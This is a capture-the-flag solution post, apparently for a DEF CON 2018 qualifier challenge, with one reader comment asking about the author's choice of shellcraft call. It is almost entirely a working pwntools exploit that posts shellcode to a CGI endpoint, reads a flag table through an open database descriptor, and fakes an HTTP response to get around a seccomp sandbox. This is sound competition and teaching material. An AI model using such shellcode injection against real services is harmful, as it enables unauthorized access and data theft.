Rating: 4.0

```python
#!/usr/bin/env python2
from pwn import *
import requests

"""
* will execute our shellcode
* only read/write due to prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT)
* have to return valid HTTP response otherwise will get 500
* can query the db using fd 4
"""

context.arch = "amd64"
context.os = "linux"

host = "http://b9d6d408.quals2018.oooverflow.io/cgi-bin/"
html = """X-Powered-By: PHP/7.0.28-0ubuntu0.16.04.1\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n<html><body>Hello World!</body></html>"""

query = "SELECT * from flag;"

shellcode = ""
shellcode += shellcraft.echo(p16(len(query)) + "\x00\x00\x03" + query , 4)
shellcode += shellcraft.read(4, 'rsp', 200)
shellcode += shellcraft.pushstr(html)
shellcode += shellcraft.write(1, 'rsp', 500)

data = {
"shell": asm(shellcode) + "\x00"
}

resp = requests.post(host + "index.php", data=data)
print resp.text

```

--vakzz

dirty_vish – May 15, 2018, 2:29 p.m.

Why do you use "shellcraft.pushstr" instead of "shellcraft.echo" for the html string so you can echo it out to STDOUT?